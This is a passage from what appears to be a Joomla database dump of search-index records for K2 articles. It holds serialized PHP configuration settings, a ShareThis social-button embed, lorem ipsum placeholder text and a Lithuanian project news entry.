displayText=\'ShareThis\'></span>\r\n</div>\";s:15:\"twitterUsername\";s:0:\"\";s:13:\"facebookImage\";s:6:\"Medium\";s:8:\"comments\";s:1:\"1\";s:16:\"commentsOrdering\";s:4:\"DESC\";s:13:\"commentsLimit\";s:2:\"10\";s:20:\"commentsFormPosition\";s:5:\"below\";s:18:\"commentsPublishing\";s:1:\"1\";s:17:\"commentsReporting\";s:1:\"2\";s:23:\"commentsReportRecipient\";s:0:\"\";s:24:\"inlineCommentsModeration\";s:1:\"0\";s:8:\"gravatar\";s:1:\"1\";s:8:\"antispam\";s:1:\"0\";s:22:\"recaptchaForRegistered\";s:1:\"1\";s:20:\"akismetForRegistered\";s:1:\"1\";s:17:\"commentsFormNotes\";s:1:\"1\";s:21:\"commentsFormNotesText\";s:0:\"\";s:15:\"frontendEditing\";s:1:\"1\";s:12:\"showImageTab\";s:1:\"1\";s:19:\"showImageGalleryTab\";s:1:\"1\";s:12:\"showVideoTab\";s:1:\"1\";s:18:\"showExtraFieldsTab\";s:1:\"1\";s:18:\"showAttachmentsTab\";s:1:\"1\";s:13:\"showK2Plugins\";s:1:\"1\";s:22:\"sideBarDisplayFrontend\";s:1:\"0\";s:12:\"mergeEditors\";s:1:\"1\";s:14:\"sideBarDisplay\";s:1:\"1\";s:17:\"attachmentsFolder\";s:0:\"\";s:16:\"hideImportButton\";s:1:\"1\";s:12:\"googleSearch\";s:1:\"0\";s:21:\"googleSearchContainer\";s:23:\"k2GoogleSearchContainer\";s:13:\"K2UserProfile\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:11:\"adminSearch\";s:6:\"simple\";s:12:\"cookieDomain\";s:0:\"\";s:13:\"taggingSystem\";s:1:\"1\";s:8:\"lockTags\";s:1:\"0\";s:13:\"showTagFilter\";s:1:\"0\";s:9:\"k2TagNorm\";s:1:\"0\";s:13:\"k2TagNormCase\";s:5:\"lower\";s:31:\"k2TagNormAdditionalReplacements\";s:0:\"\";s:20:\"recaptcha_public_key\";s:0:\"\";s:21:\"recaptcha_private_key\";s:0:\"\";s:15:\"recaptcha_theme\";s:5:\"clean\";s:23:\"recaptchaOnRegistration\";s:1:\"0\";s:13:\"akismetApiKey\";s:0:\"\";s:13:\"stopForumSpam\";s:1:\"0\";s:19:\"stopForumSpamApiKey\";s:0:\"\";s:21:\"showItemsCounterAdmin\";s:1:\"1\";s:17:\"showChildCatItems\";s:1:\"1\";s:22:\"disableCompactOrdering\";s:1:\"0\";s:13:\"metaDescLimit\";s:3:\"150\";s:22:\"enforceSEFReplacements\";s:1:\"0\";s:15:\"SEFReplacements\";s:2768:\"À|A, Á|A, Â|A, Ã|A, Ä|A, Å|A, à|a, á|a, â|a, ã|a, ä|a, å|a, Ā|A, ā|a, Ă|A, ă|a, Ą|A, ą|a, Ç|C, ç|c, Ć|C, ć|c, Ĉ|C, ĉ|c, Ċ|C, ċ|c, Č|C, č|c, Ð|D, ð|d, Ď|D, ď|d, Đ|D, đ|d, È|E, É|E, Ê|E, Ë|E, è|e, é|e, ê|e, ë|e, Ē|E, ē|e, Ĕ|E, ĕ|e, Ė|E, ė|e, Ę|E, ę|e, Ě|E, ě|e, Ĝ|G, ĝ|g, Ğ|G, ğ|g, Ġ|G, ġ|g, Ģ|G, ģ|g, Ĥ|H, ĥ|h, Ħ|H, ħ|h, Ì|I, Í|I, Î|I, Ï|I, ì|i, í|i, î|i, ï|i, Ĩ|I, ĩ|i, Ī|I, ī|i, Ĭ|I, ĭ|i, Į|I, į|i, İ|I, ı|i, Ĵ|J, ĵ|j, Ķ|K, ķ|k, ĸ|k, Ĺ|L, ĺ|l, Ļ|L, ļ|l, Ľ|L, ľ|l, Ŀ|L, ŀ|l, Ł|L, ł|l, Ñ|N, ñ|n, Ń|N, ń|n, Ņ|N, ņ|n, Ň|N, ň|n, ŉ|n, Ŋ|N, ŋ|n, Ò|O, Ó|O, Ô|O, Õ|O, Ö|O, Ø|O, ò|o, ó|o, ô|o, õ|o, ö|o, ø|o, Ō|O, ō|o, Ŏ|O, ŏ|o, Ő|O, ő|o, Ŕ|R, ŕ|r, Ŗ|R, ŗ|r, Ř|R, ř|r, Ś|S, ś|s, Ŝ|S, ŝ|s, Ş|S, ş|s, Š|S, š|s, ſ|s, Ţ|T, ţ|t, Ť|T, ť|t, Ŧ|T, ŧ|t, Ù|U, Ú|U, Û|U, Ü|U, ù|u, ú|u, û|u, ü|u, Ũ|U, ũ|u, Ū|U, ū|u, Ŭ|U, ŭ|u, Ů|U, ů|u, Ű|U, ű|u, Ų|U, ų|u, Ŵ|W, ŵ|w, Ý|Y, ý|y, ÿ|y, Ŷ|Y, ŷ|y, Ÿ|Y, Ź|Z, ź|z, Ż|Z, ż|z, Ž|Z, ž|z, α|a, β|b, γ|g, δ|d, ε|e, ζ|z, η|h, θ|th, ι|i, κ|k, λ|l, μ|m, ν|n, ξ|x, ο|o, π|p, ρ|r, σ|s, τ|t, υ|y, φ|f, χ|ch, ψ|ps, ω|w, Α|A, Β|B, Γ|G, Δ|D, Ε|E, Ζ|Z, Η|H, Θ|Th, Ι|I, Κ|K, Λ|L, Μ|M, Ξ|X, Ο|O, Π|P, Ρ|R, Σ|S, Τ|T, Υ|Y, Φ|F, Χ|Ch, Ψ|Ps, Ω|W, ά|a, έ|e, ή|h, ί|i, ό|o, ύ|y, ώ|w, Ά|A, Έ|E, Ή|H, Ί|I, Ό|O, Ύ|Y, Ώ|W, ϊ|i, ΐ|i, ϋ|y, ς|s, А|A, Ӑ|A, Ӓ|A, Ә|E, Ӛ|E, Ӕ|E, Б|B, В|V, Г|G, Ґ|G, Ѓ|G, Ғ|G, Ӷ|G, y|Y, Д|D, Е|E, Ѐ|E, Ё|YO, Ӗ|E, Ҽ|E, Ҿ|E, Є|YE, Ж|ZH, Ӂ|DZH, Җ|ZH, Ӝ|DZH, З|Z, Ҙ|Z, Ӟ|DZ, Ӡ|DZ, Ѕ|DZ, И|I, Ѝ|I, Ӥ|I, Ӣ|I, І|I, Ї|JI, Ӏ|I, Й|Y, Ҋ|Y, Ј|J, К|K, Қ|Q, Ҟ|Q, Ҡ|K, Ӄ|Q, Ҝ|K, Л|L, Ӆ|L, Љ|L, М|M, Ӎ|M, Н|N, Ӊ|N, Ң|N, Ӈ|N, Ҥ|N, Њ|N, О|O, Ӧ|O, Ө|O, Ӫ|O, Ҩ|O, П|P, Ҧ|PF, Р|P, Ҏ|P, С|S, Ҫ|S, Т|T, Ҭ|TH, Ћ|T, Ќ|K, У|U, Ў|U, Ӳ|U, Ӱ|U, Ӯ|U, Ү|U, Ұ|U, Ф|F, Х|H, Ҳ|H, Һ|H, Ц|TS, Ҵ|TS, Ч|CH, Ӵ|CH, Ҷ|CH, Ӌ|CH, Ҹ|CH, Џ|DZ, Ш|SH, Щ|SHT, Ъ|A, Ы|Y, Ӹ|Y, Ь|Y, Ҍ|Y, Э|E, Ӭ|E, Ю|YU, Я|YA, а|a, ӑ|a, ӓ|a, ә|e, ӛ|e, ӕ|e, б|b, в|v, г|g, ґ|g, ѓ|g, ғ|g, ӷ|g, y|y, д|d, е|e, ѐ|e, ё|yo, ӗ|e, ҽ|e, ҿ|e, є|ye, ж|zh, ӂ|dzh, җ|zh, ӝ|dzh, з|z, ҙ|z, ӟ|dz, ӡ|dz, ѕ|dz, и|i, ѝ|i, ӥ|i, ӣ|i, і|i, ї|ji, Ӏ|i, й|y, ҋ|y, ј|j, к|k, қ|q, ҟ|q, ҡ|k, ӄ|q, ҝ|k, л|l, ӆ|l, љ|l, м|m, ӎ|m, н|n, ӊ|n, ң|n, ӈ|n, ҥ|n, њ|n, о|o, ӧ|o, ө|o, ӫ|o, ҩ|o, п|p, ҧ|pf, р|p, ҏ|p, с|s, ҫ|s, т|t, ҭ|th, ћ|t, ќ|k, у|u, ў|u, ӳ|u, ӱ|u, ӯ|u, ү|u, ұ|u, ф|f, х|h, ҳ|h, һ|h, ц|ts, ҵ|ts, ч|ch, ӵ|ch, ҷ|ch, ӌ|ch, ҹ|ch, џ|dz, ш|sh, щ|sht, ъ|a, ы|y, ӹ|y, ь|y, ҍ|y, э|e, ӭ|e, ю|yu, я|ya\";s:5:\"k2Sef\";s:1:\"0\";s:13:\"k2SefLabelCat\";s:7:\"content\";s:13:\"k2SefLabelTag\";s:3:\"tag\";s:14:\"k2SefLabelUser\";s:6:\"author\";s:16:\"k2SefLabelSearch\";s:6:\"search\";s:14:\"k2SefLabelDate\";s:4:\"date\";s:14:\"k2SefLabelItem\";s:1:\"0\";s:26:\"k2SefLabelItemCustomPrefix\";s:0:\"\";s:17:\"k2SefInsertItemId\";s:1:\"1\";s:24:\"k2SefItemIdTitleAliasSep\";s:4:\"dash\";s:22:\"k2SefUseItemTitleAlias\";s:1:\"1\";s:16:\"k2SefInsertCatId\";s:1:\"1\";s:23:\"k2SefCatIdTitleAliasSep\";s:4:\"dash\";s:21:\"k2SefUseCatTitleAlias\";s:1:\"1\";s:16:\"sh404SefLabelCat\";s:0:\"\";s:17:\"sh404SefLabelUser\";s:4:\"blog\";s:17:\"sh404SefLabelItem\";s:1:\"2\";s:18:\"sh404SefTitleAlias\";s:5:\"alias\";s:29:\"sh404SefModK2ContentFeedAlias\";s:4:\"feed\";s:20:\"sh404SefInsertItemId\";s:1:\"0\";s:26:\"sh404SefInsertUniqueItemId\";s:1:\"0\";s:13:\"cbIntegration\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";}}s:8:\"ordering\";s:1:\"4\";s:5:\"trash\";s:1:\"1\";s:9:\"cat_trash\";s:1:\"0\";s:8:\"category\";s:11:\"Latest News\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:87:\"4:oxford-s-part-in-a-new-multiple-sclerosis-drug-adipisicing-elit-sed-do-eiusmod-tempor\";s:7:\"catslug\";s:13:\"1:latest-news\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:4:\"item\";s:4:\"path\";s:121:\"index.php/lankytini-objektai/item/4-oxford-s-part-in-a-new-multiple-sclerosis-drug-adipisicing-elit-sed-do-eiusmod-tempor\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"K2 Item\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"K2 Item\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:11:\"K2 Category\";a:1:{s:11:\"Latest News\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:11:\"Latest News\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:38:\"index.php?option=com_k2&view=item&id=4\";s:5:\"route\";s:135:\"index.php?option=com_k2&view=item&id=4:oxford-s-part-in-a-new-multiple-sclerosis-drug-adipisicing-elit-sed-do-eiusmod-tempor&Itemid=290\";s:5:\"title\";s:86:\"Oxford\'s part in a new multiple sclerosis drug  adipisicing elit sed do eiusmod tempor\";s:11:\"description\";s:543:\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2013-09-25 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-10-24 00:00:00\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:1;}'),(6,'index.php?option=com_k2&view=item&id=26','index.php?option=com_k2&view=item&id=26:projektas-tytuvenu-iveiklinimas-ir-aktualizavimas&Itemid=290','Projektas Tytuvėnų įveiklinimas ir aktualizavimas','','2025-04-01 09:32:46','0b21d5b30a2e626754e00777eb72356a',1,0,1,'*','2025-04-01 09:29:00','0000-00-00 00:00:00','2025-04-01 06:17:08','0000-00-00 00:00:00',0,0,1,_binary 'O:19:\"FinderIndexerResult\":18:{s:11:\"\0*\0elements\";a:25:{s:2:\"id\";s:2:\"26\";s:5:\"alias\";s:49:\"projektas-tytuvenu-iveiklinimas-ir-aktualizavimas\";s:7:\"summary\";s:0:\"\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:1:\"1\";s:10:\"created_by\";s:3:\"135\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2025-04-01 06:32:45\";s:11:\"modified_by\";s:3:\"135\";s:6:\"params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":155:{s:10:\"enable_css\";s:1:\"1\";s:14:\"jQueryHandling\";s:5:\"1.8.3\";s:21:\"backendJQueryHandling\";s:6:\"remote\";s:8:\"userName\";s:1:\"1\";s:9:\"userImage\";s:1:\"1\";s:15:\"userDescription\";s:1:\"1\";s:7:\"userURL\";s:1:\"1\";s:9:\"userEmail\";s:1:\"0\";s:12:\"userFeedLink\";s:1:\"1\";s:12:\"userFeedIcon\";s:1:\"1\";s:13:\"userItemCount\";s:2:\"10\";s:13:\"userItemTitle\";s:1:\"1\";s:19:\"userItemTitleLinked\";s:1:\"1\";s:19:\"userItemDateCreated\";s:1:\"1\";s:13:\"userItemImage\";s:1:\"1\";s:17:\"userItemIntroText\";s:1:\"1\";s:16:\"userItemCategory\";s:1:\"1\";s:12:\"userItemTags\";s:1:\"1\";s:22:\"userItemCommentsAnchor\";s:1:\"1\";s:16:\"userItemReadMore\";s:1:\"1\";s:17:\"userItemK2Plugins\";s:1:\"1\";s:12:\"tagItemCount\";s:2:\"10\";s:12:\"tagItemTitle\";s:1:\"1\";s:18:\"tagItemTitleLinked\";s:1:\"1\";s:18:\"tagItemDateCreated\";s:1:\"1\";s:12:\"tagItemImage\";s:1:\"1\";s:16:\"tagItemIntroText\";s:1:\"1\";s:15:\"tagItemCategory\";s:1:\"1\";s:15:\"tagItemReadMore\";s:1:\"1\";s:18:\"tagItemExtraFields\";s:1:\"0\";s:11:\"tagOrdering\";s:0:\"\";s:11:\"tagFeedLink\";s:1:\"1\";s:11:\"tagFeedIcon\";s:1:\"1\";s:16:\"genericItemCount\";s:2:\"10\";s:16:\"genericItemTitle\";s:1:\"1\";s:22:\"genericItemTitleLinked\";s:1:\"1\";s:22:\"genericItemDateCreated\";s:1:\"1\";s:16:\"genericItemImage\";s:1:\"1\";s:20:\"genericItemIntroText\";s:1:\"1\";s:19:\"genericItemCategory\";s:1:\"1\";s:19:\"genericItemReadMore\";s:1:\"1\";s:22:\"genericItemExtraFields\";s:1:\"0\";s:15:\"genericFeedLink\";s:1:\"1\";s:15:\"genericFeedIcon\";s:1:\"1\";s:9:\"feedLimit\";s:2:\"10\";s:13:\"feedItemImage\";s:1:\"1\";s:11:\"feedImgSize\";s:1:\"S\";s:17:\"feedItemIntroText\";s:1:\"1\";s:17:\"feedTextWordLimit\";s:0:\"\";s:16:\"feedItemFullText\";s:1:\"1\";s:12:\"feedItemTags\";s:1:\"0\";s:13:\"feedItemVideo\";s:1:\"0\";s:15:\"feedItemGallery\";s:1:\"0\";s:19:\"feedItemAttachments\";s:1:\"0\";s:14:\"feedBogusEmail\";s:0:\"\";s:16:\"introTextCleanup\";s:1:\"0\";s:27:\"introTextCleanupExcludeTags\";s:0:\"\";s:23:\"introTextCleanupTagAttr\";s:0:\"\";s:15:\"fullTextCleanup\";s:1:\"0\";s:26:\"fullTextCleanupExcludeTags\";s:0:\"\";s:22:\"fullTextCleanupTagAttr\";s:0:\"\";s:12:\"xssFiltering\";s:1:\"0\";s:14:\"linkPopupWidth\";s:3:\"900\";s:15:\"linkPopupHeight\";s:3:\"600\";s:13:\"imagesQuality\";s:3:\"100\";s:11:\"itemImageXS\";s:3:\"100\";s:10:\"itemImageS\";s:3:\"200\";s:10:\"itemImageM\";s:3:\"400\";s:10:\"itemImageL\";s:3:\"870\";s:11:\"itemImageXL\";s:3:\"900\";s:16:\"itemImageGeneric\";s:3:\"350\";s:13:\"catImageWidth\";s:3:\"100\";s:15:\"catImageDefault\";s:1:\"1\";s:14:\"userImageWidth\";s:3:\"100\";s:16:\"userImageDefault\";s:1:\"1\";s:17:\"commenterImgWidth\";s:2:\"48\";s:17:\"onlineImageEditor\";s:8:\"splashup\";s:14:\"imageTimestamp\";s:1:\"0\";s:16:\"imageMemoryLimit\";s:0:\"\";s:16:\"socialButtonCode\";s:708:\"<script type=\"text/javascript\" src=\"http://w.sharethis.com/button/buttons.js\"></script>\r\n<script type=\"text/javascript\">stLight.options({publisher: \"ur-c64aa0b1-b15d-c411-f5fd-ee8e97f0f64d\"}); </script>\r\n\r\n<div style=\"padding:20px 0\" class=\"social-share\">\r\n<span class=\'st_facebook_vcount\' displayText=\'Facebook\'></span>\r\n<span class=\'st_twitter_vcount\' displayText=\'Tweet\'></span>\r\n<span class=\'st_googleplus_vcount\' displayText=\'+1\'></span>\r\n<span class=\'st_linkedin_vcount\' displayText=\'LinkedIn\'></span>\r\n<span class=\'st_pinterest_vcount\' displayText=\'Pinterest\'></span>\r\n<span class=\'st_email_vcount\' displayText=\'Email\'></span>\r\n<span class=\'st_sharethis_vcount\' displayText=\'ShareThis\'></span>\r\n</div>\";s:15:\"twitterUsername\";s:0:\"\";s:13:\"facebookImage\";s:6:\"Medium\";s:8:\"comments\";s:1:\"1\";s:16:\"commentsOrdering\";s:4:\"DESC\";s:13:\"commentsLimit\";s:2:\"10\";s:20:\"commentsFormPosition\";s:5:\"below\";s:18:\"commentsPublishing\";s:1:\"1\";s:17:\"commentsReporting\";s:1:\"2\";s:23:\"commentsReportRecipient\";s:0:\"\";s:24:\"inlineCommentsModeration\";s:1:\"0\";s:8:\"gravatar\";s:1:\"1\";s:8:\"antispam\";s:1:\"0\";s:22:\"recaptchaForRegistered\";s:1:\"1\";s:20:\"akismetForRegistered\";s:1:\"1\";s:17:\"commentsFormNotes\";s:1:\"1\";s:21:\"commentsFormNotesText\";s:0:\"\";s:15:\"frontendEditing\";s:1:\"1\";s:12:\"showImageTab\";s:1:\"1\";s:19:\"showImageGalleryTab\";s:1:\"1\";s:12:\"showVideoTab\";s:1:\"1\";s:18:\"showExtraFieldsTab\";s:1:\"1\";s:18:\"showAttachmentsTab\";s:1:\"1\";s:13:\"showK2Plugins\";s:1:\"1\";s:22:\"sideBarDisplayFrontend\";s:1:\"0\";s:12:\"mergeEditors\";s:1:\"1\";s:14:\"sideBarDisplay\";s:1:\"1\";s:17:\"attachmentsFolder\";s:0:\"\";s:16:\"hideImportButton\";s:1:\"1\";s:12:\"googleSearch\";s:1:\"0\";s:21:\"googleSearchContainer\";s:23:\"k2GoogleSearchContainer\";s:13:\"K2UserProfile\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:11:\"adminSearch\";s:6:\"simple\";s:12:\"cookieDomain\";s:0:\"\";s:13:\"taggingSystem\";s:1:\"1\";s:8:\"lockTags\";s:1:\"0\";s:13:\"showTagFilter\";s:1:\"0\";s:9:\"k2TagNorm\";s:1:\"0\";s:13:\"k2TagNormCase\";s:5:\"lower\";s:31:\"k2TagNormAdditionalReplacements\";s:0:\"\";s:20:\"recaptcha_public_key\";s:0:\"\";s:21:\"recaptcha_private_key\";s:0:\"\";s:15:\"recaptcha_theme\";s:5:\"clean\";s:23:\"recaptchaOnRegistration\";s:1:\"0\";s:13:\"akismetApiKey\";s:0:\"\";s:13:\"stopForumSpam\";s:1:\"0\";s:19:\"stopForumSpamApiKey\";s:0:\"\";s:21:\"showItemsCounterAdmin\";s:1:\"1\";s:17:\"showChildCatItems\";s:1:\"1\";s:22:\"disableCompactOrdering\";s:1:\"0\";s:13:\"metaDescLimit\";s:3:\"150\";s:22:\"enforceSEFReplacements\";s:1:\"0\";s:15:\"SEFReplacements\";s:2768:\"À|A, Á|A, Â|A, Ã|A, Ä|A, Å|A, à|a, á|a, â|a, ã|a, ä|a, å|a, Ā|A, ā|a, Ă|A, ă|a, Ą|A, ą|a, Ç|C, ç|c, Ć|C, ć|c, Ĉ|C, ĉ|c, Ċ|C, ċ|c, Č|C, č|c, Ð|D, ð|d, Ď|D, ď|d, Đ|D, đ|d, È|E, É|E, Ê|E, Ë|E, è|e, é|e, ê|e, ë|e, Ē|E, ē|e, Ĕ|E, ĕ|e, Ė|E, ė|e, Ę|E, ę|e, Ě|E, ě|e, Ĝ|G, ĝ|g, Ğ|G, ğ|g, Ġ|G, ġ|g, Ģ|G, ģ|g, Ĥ|H, ĥ|h, Ħ|H, ħ|h, Ì|I, Í|I, Î|I, Ï|I, ì|i, í|i, î|i, ï|i, Ĩ|I, ĩ|i, Ī|I, ī|i, Ĭ|I, ĭ|i, Į|I, į|i, İ|I, ı|i, Ĵ|J, ĵ|j, Ķ|K, ķ|k, ĸ|k, Ĺ|L, ĺ|l, Ļ|L, ļ|l, Ľ|L, ľ|l, Ŀ|L, ŀ|l, Ł|L, ł|l, Ñ|N, ñ|n, Ń|N, ń|n, Ņ|N, ņ|n, Ň|N, ň|n, ŉ|n, Ŋ|N, ŋ|n, Ò|O, Ó|O, Ô|O, Õ|O, Ö|O, Ø|O, ò|o, ó|o, ô|o, õ|o, ö|o, ø|o, Ō|O, ō|o, Ŏ|O, ŏ|o, Ő|O, ő|o, Ŕ|R, ŕ|r, Ŗ|R, ŗ|r, Ř|R, ř|r, Ś|S, ś|s, Ŝ|S, ŝ|s, Ş|S, ş|s, Š|S, š|s, ſ|s, Ţ|T, ţ|t, Ť|T, ť|t, Ŧ|T, ŧ|t, Ù|U, Ú|U, Û|U, Ü|U, ù|u, ú|u, û|u, ü|u, Ũ|U, ũ|u, Ū|U, ū|u, Ŭ|U, ŭ|u, Ů|U, ů|u, Ű|U, ű|u, Ų|U, ų|u, Ŵ|W, ŵ|w, Ý|Y, ý|y, ÿ|y, Ŷ|Y, ŷ|y, Ÿ|Y, Ź|Z, ź|z, Ż|Z, ż|z, Ž|Z, ž|z, α|a, β|b, γ|g, δ|d, ε|e, ζ|z, η|h, θ|th, ι|i, κ|k, λ|l, μ|m, ν|n, ξ|x, ο|o, π|p, ρ|r, σ|s, τ|t, υ|y, φ|f, χ|ch, ψ|ps, ω|w, Α|A, Β|B, Γ|G, Δ|D, Ε|E, Ζ|Z, Η|H, Θ|Th, Ι|I, Κ|K, Λ|L, Μ|M, Ξ|X, Ο|O, Π|P, Ρ|R, Σ|S, Τ|T, Υ|Y, Φ|F, Χ|Ch, Ψ|Ps, Ω|W, ά|a, έ|e, ή|h, ί|i, ό|o, ύ|y, ώ|w, Ά|A, Έ|E, Ή|H, Ί|I, Ό|O, Ύ|Y, Ώ|W, ϊ|i, ΐ|i, ϋ|y, ς|s, А|A, Ӑ|A, Ӓ|A, Ә|E, Ӛ|E, Ӕ|E, Б|B, В|V, Г|G, Ґ|G, Ѓ|G, Ғ|G, Ӷ|G, y|Y, Д|D, Е|E, Ѐ|E, Ё|YO, Ӗ|E, Ҽ|E, Ҿ|E, Є|YE, Ж|ZH, Ӂ|DZH, Җ|ZH, Ӝ|DZH, З|Z, Ҙ|Z, Ӟ|DZ, Ӡ|DZ, Ѕ|DZ, И|I, Ѝ|I, Ӥ|I, Ӣ|I, І|I, Ї|JI, Ӏ|I, Й|Y, Ҋ|Y, Ј|J, К|K, Қ|Q, Ҟ|Q, Ҡ|K, Ӄ|Q, Ҝ|K, Л|L, Ӆ|L, Љ|L, М|M, Ӎ|M, Н|N, Ӊ|N, Ң|N, Ӈ|N, Ҥ|N, Њ|N, О|O, Ӧ|O, Ө|O, Ӫ|O, Ҩ|O, П|P, Ҧ|PF, Р|P, Ҏ|P, С|S, Ҫ|S, Т|T, Ҭ|TH, Ћ|T, Ќ|K, У|U, Ў|U, Ӳ|U, Ӱ|U, Ӯ|U, Ү|U, Ұ|U, Ф|F, Х|H, Ҳ|H, Һ|H, Ц|TS, Ҵ|TS, Ч|CH, Ӵ|CH, Ҷ|CH, Ӌ|CH, Ҹ|CH, Џ|DZ, Ш|SH, Щ|SHT, Ъ|A, Ы|Y, Ӹ|Y, Ь|Y, Ҍ|Y, Э|E, Ӭ|E, Ю|YU, Я|YA, а|a, ӑ|a, ӓ|a, ә|e, ӛ|e, ӕ|e, б|b, в|v, г|g, ґ|g, ѓ|g, ғ|g, ӷ|g, y|y, д|d, е|e, ѐ|e, ё|yo, ӗ|e, ҽ|e, ҿ|e, є|ye, ж|zh, ӂ|dzh, җ|zh, ӝ|dzh, з|z, ҙ|z, ӟ|dz, ӡ|dz, ѕ|dz, и|i, ѝ|i, ӥ|i, ӣ|i, і|i, ї|ji, Ӏ|i, й|y, ҋ|y, ј|j, к|k, қ|q, ҟ|q, ҡ|k, ӄ|q, ҝ|k, л|l, ӆ|l, љ|l, м|m, ӎ|m, н|n, ӊ|n, ң|n, ӈ|n, ҥ|n, њ|n, о|o, ӧ|o, ө|o, ӫ|o, ҩ|o, п|p, ҧ|pf, р|p, ҏ|p, с|s, ҫ|s, т|t, ҭ|th, ћ|t, ќ|k, у|u, ў|u, ӳ|u, ӱ|u, ӯ|u, ү|u, ұ|u, ф|f, х|h, ҳ|h, һ|h, ц|ts, ҵ|ts, ч|ch, ӵ|ch, ҷ|ch, ӌ|ch, ҹ|ch, џ|dz, ш|sh, щ|sht, ъ|a, ы|y, ӹ|y, ь|y, ҍ|y, э|e, ӭ|e, ю|yu, я|ya\";s:5:\"k2Sef\";s:1:\"0\";s:13:\"k2SefLabelCat\";s:7:\"content\";s:13:\"k2SefLabelTag\";s:3:\"tag\";s:14:\"k2SefLabelUser\";s:6:\"author\";s:16:\"k2SefLabelSearch\";s:6:\"search\";s:14:\"k2SefLabelDate\";s:4:\"date\";s:14:\"k2SefLabelItem\";s:1:\"0\";s:26:\"k2SefLabelItemCustomPrefix\";s:0:\"\";s:17:\"k2SefInsertItemId\";s:1:\"1\";s:24:\"k2SefItemIdTitleAliasSep\";s:4:\"dash\";s:22:\"k2SefUseItemTitleAlias\";s:1:\"1\";s:16:\"k2SefInsertCatId\";s:1:\"1\";s:23:\"k2SefCatIdTitleAliasSep\";s:4:\"dash\";s:21:\"k2SefUseCatTitleAlias\";s:1:\"1\";s:16:\"sh404SefLabelCat\";s:0:\"\";s:17:\"sh404SefLabelUser\";s:4:\"blog\";s:17:\"sh404SefLabelItem\";s:1:\"2\";s:18:\"sh404SefTitleAlias\";s:5:\"alias\";s:29:\"sh404SefModK2ContentFeedAlias\";s:4:\"feed\";s:20:\"sh404SefInsertItemId\";s:1:\"0\";s:26:\"sh404SefInsertUniqueItemId\";s:1:\"0\";s:13:\"cbIntegration\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";}}s:8:\"ordering\";s:1:\"1\";s:5:\"trash\";s:1:\"0\";s:9:\"cat_trash\";s:1:\"0\";s:8:\"category\";s:11:\"Latest News\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:52:\"26:projektas-tytuvenu-iveiklinimas-ir-aktualizavimas\";s:7:\"catslug\";s:13:\"1:latest-news\";s:6:\"author\";s:10:\"Super 